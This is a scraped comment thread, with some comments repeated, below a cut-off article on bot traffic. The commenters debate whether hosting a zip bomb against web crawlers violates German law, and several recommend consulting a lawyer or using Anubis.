The majority of the traffic on the web is from bots. For the most part, these bots are used to discover new content. These are RSS Feed readers, search engines crawling your content, or nowadays AI bo
A crawler is a data processing machine, nothing more. therefor you are disrupting dataprocessing through data. If you think its not thats ok too.
Nah it’s definitely disrupting data processing, even though at a very low-key level – you’re not causing any data to become invalid or such. It’s the intent to harm the operator that’s the linchpin: “Jemandem einen Nachteil zufügen”. “Jemand” needs to be a person, natural or legal. And by stopping a crawler you don’t want to inflict a disadvantage on the operator you want to, at most, stop them from gaining an advantage. “Inflict disadvantage” and “prevent advantage” are two different things.
I would still advise to contact your lawyer in germany if you are thinking about hosting a zipbomb
Good idea, but as already said before: First, you should contact a sysadmin. Who will tell you it’s a stupid idea.
Nah it’s definitely disrupting data processing, even though at a very low-key level – you’re not causing any data to become invalid or such. It’s the intent to harm the operator that’s the linchpin: “Jemandem einen Nachteil zufügen”. “Jemand” needs to be a person, natural or legal. And by stopping a crawler you don’t want to inflict a disadvantage on the operator you want to, at most, stop them from gaining an advantage. “Inflict disadvantage” and “prevent advantage” are two different things.
Good idea, but as already said before: First, you should contact a sysadmin. Who will tell you it’s a stupid idea.
“Jemand” could be the owner of the company, further 5. Explicitly mentions companies so this is kinda a void argument.
I mean i never argued against that, like you already postet anubis is a way better option and not against german law afaik